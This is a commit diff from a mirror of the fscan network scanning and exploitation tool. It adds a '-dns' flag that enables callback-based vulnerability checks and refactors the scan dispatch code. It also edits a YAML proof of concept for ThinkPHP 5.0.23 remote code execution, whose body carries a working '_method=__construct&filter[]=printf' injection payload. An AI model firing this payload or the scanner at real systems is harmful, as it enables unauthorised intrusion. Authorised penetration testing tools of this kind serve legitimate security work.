mirror of https://github.com/qwqdanchun/fscan.git
增加-dns参数启用dnslog poc
This commit is contained in:
parent
9b0f12c31a
commit
98569648bb
|
@ -1,7 +1,6 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/WebScan/lib"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
|
@ -21,6 +20,8 @@ func Scan(info common.HostInfo) {
|
|||
lib.Inithttp(common.Pocinfo)
|
||||
var ch = make(chan struct{}, common.Threads)
|
||||
var wg = sync.WaitGroup{}
|
||||
web := strconv.Itoa(common.PORTList["web"])
|
||||
ms17010 := strconv.Itoa(common.PORTList["ms17010"])
|
||||
if len(Hosts) > 0 || len(common.HostPort) > 0 {
|
||||
if common.IsPing == false && len(Hosts) > 0 {
|
||||
Hosts = CheckLive(Hosts, common.Ping)
|
||||
|
@ -30,6 +31,7 @@ func Scan(info common.HostInfo) {
|
|||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
common.GC()
|
||||
var AlivePorts []string
|
||||
if common.Scantype == "webonly" {
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
|
@ -47,6 +49,7 @@ func Scan(info common.HostInfo) {
|
|||
common.HostPort = nil
|
||||
fmt.Println("[*] AlivePorts len is:", len(AlivePorts))
|
||||
}
|
||||
common.GC()
|
||||
var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
|
||||
for _, port := range common.PORTList {
|
||||
severports = append(severports, strconv.Itoa(port))
|
||||
|
@ -56,31 +59,30 @@ func Scan(info common.HostInfo) {
|
|||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if common.Scantype == "all" || common.Scantype == "main" {
|
||||
switch {
|
||||
case info.Ports == "135":
|
||||
AddScan(info.Ports, info, ch, &wg) //findnet
|
||||
case info.Ports == "445":
|
||||
AddScan(ms17010, info, &ch, &wg) //ms17010
|
||||
//AddScan(info.Ports, info, ch, &wg) //smb
|
||||
AddScan("1000001", info, ch, &wg) //ms17010
|
||||
//AddScan("1000002", info, ch, &wg) //smbghost
|
||||
case info.Ports == "9000":
|
||||
AddScan(info.Ports, info, ch, &wg) //fcgiscan
|
||||
AddScan("1000003", info, ch, &wg) //http
|
||||
AddScan(web, info, &ch, &wg) //http
|
||||
AddScan(info.Ports, info, &ch, &wg) //fcgiscan
|
||||
case IsContain(severports, info.Ports):
|
||||
AddScan(info.Ports, info, ch, &wg) //plugins scan
|
||||
AddScan(info.Ports, info, &ch, &wg) //plugins scan
|
||||
default:
|
||||
AddScan("1000003", info, ch, &wg) //webtitle
|
||||
AddScan(web, info, &ch, &wg) //webtitle
|
||||
}
|
||||
} else {
|
||||
port, _ := common.PORTList[common.Scantype]
|
||||
scantype := strconv.Itoa(port)
|
||||
AddScan(scantype, info, ch, &wg)
|
||||
scantype := strconv.Itoa(common.PORTList[common.Scantype])
|
||||
AddScan(scantype, info, &ch, &wg)
|
||||
}
|
||||
}
|
||||
}
|
||||
common.GC()
|
||||
for _, url := range common.Urls {
|
||||
info.Url = url
|
||||
AddScan("1000003", info, ch, &wg)
|
||||
AddScan(web, info, &ch, &wg)
|
||||
}
|
||||
common.GC()
|
||||
wg.Wait()
|
||||
common.LogWG.Wait()
|
||||
close(common.Results)
|
||||
|
@ -89,35 +91,26 @@ func Scan(info common.HostInfo) {
|
|||
|
||||
var Mutex = &sync.Mutex{}
|
||||
|
||||
func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
|
||||
func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
|
||||
*ch <- struct{}{}
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
Mutex.Lock()
|
||||
common.Num += 1
|
||||
Mutex.Unlock()
|
||||
ScanFunc(PluginList, scantype, &info)
|
||||
ScanFunc(&scantype, &info)
|
||||
Mutex.Lock()
|
||||
common.End += 1
|
||||
Mutex.Unlock()
|
||||
<-ch
|
||||
wg.Done()
|
||||
<-*ch
|
||||
}()
|
||||
ch <- struct{}{}
|
||||
}
|
||||
|
||||
func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
|
||||
f := reflect.ValueOf(m[name])
|
||||
if len(infos) != f.Type().NumIn() {
|
||||
err = errors.New("The number of infos is not adapted ")
|
||||
fmt.Println(err.Error())
|
||||
return result, nil
|
||||
}
|
||||
in := make([]reflect.Value, len(infos))
|
||||
for k, info := range infos {
|
||||
in[k] = reflect.ValueOf(info)
|
||||
}
|
||||
result = f.Call(in)
|
||||
return result, nil
|
||||
func ScanFunc(name *string, info *common.HostInfo) {
|
||||
f := reflect.ValueOf(PluginList[*name])
|
||||
in := []reflect.Value{reflect.ValueOf(info)}
|
||||
f.Call(in)
|
||||
}
|
||||
|
||||
func IsContain(items []string, item string) bool {
|
||||
|
|
|
@ -82,7 +82,9 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
for _, item := range p.Set {
|
||||
k, expression := item.Key, item.Value
|
||||
if expression == "newReverse()" {
|
||||
return false, nil, ""
|
||||
if !common.DnsLog {
|
||||
return false, nil, ""
|
||||
}
|
||||
variableMap[k] = newReverse()
|
||||
continue
|
||||
}
|
||||
|
|
|
@ -1,6 +1,4 @@
|
|||
name: poc-yaml-thinkphp5023-method-rce
|
||||
set:
|
||||
rand: randomLowercase(10)
|
||||
groups:
|
||||
poc1:
|
||||
- method: POST
|
||||
|
@ -8,9 +6,9 @@ groups:
|
|||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
_method=__construct&filter[]=var_dump&method=GET&get[]={{rand}}
|
||||
_method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu
|
||||
expression: |
|
||||
response.body.bcontains(bytes(rand))
|
||||
response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu")
|
||||
poc2:
|
||||
- method: POST
|
||||
path: /index.php?s=captcha
|
||||
|
|
|
@ -99,6 +99,7 @@ var (
|
|||
)
|
||||
|
||||
var (
|
||||
DnsLog bool
|
||||
PocNum int
|
||||
PocFull bool
|
||||
CeyeDomain string
|
||||
|
|
|
@ -10,13 +10,17 @@ import (
|
|||
func init() {
|
||||
go func() {
|
||||
for {
|
||||
runtime.GC()
|
||||
debug.FreeOSMemory()
|
||||
GC()
|
||||
time.Sleep(10 * time.Second)
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
func GC() {
|
||||
runtime.GC()
|
||||
debug.FreeOSMemory()
|
||||
}
|
||||
|
||||
func Banner() {
|
||||
banner := `
|
||||
___ _
|
||||
|
@ -72,6 +76,7 @@ func Flag(Info *HostInfo) {
|
|||
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
|
||||
flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
|
||||
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
|
||||
flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc")
|
||||
flag.IntVar(&PocNum, "num", 20, "poc rate")
|
||||
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
|
||||
flag.Parse()
|
||||
|
|
1
go.mod
1
go.mod
|
@ -19,7 +19,6 @@ require (
|
|||
golang.org/x/text v0.3.6
|
||||
google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
|
||||
gopkg.in/yaml.v2 v2.4.0
|
||||
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect
|
||||
)
|
||||
|
||||
replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3
|
||||
|
|
5
go.sum
5
go.sum
|
@ -50,8 +50,6 @@ github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7
|
|||
github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
|
||||
github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
|
||||
github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
|
||||
github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w=
|
||||
github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc=
|
||||
github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
|
||||
github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
|
||||
github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
|
||||
|
@ -255,7 +253,6 @@ golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8U
|
|||
golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
|
||||
golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc=
|
||||
|
@ -331,6 +328,8 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w
|
|||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
|
|
Loading…
Reference in New Issue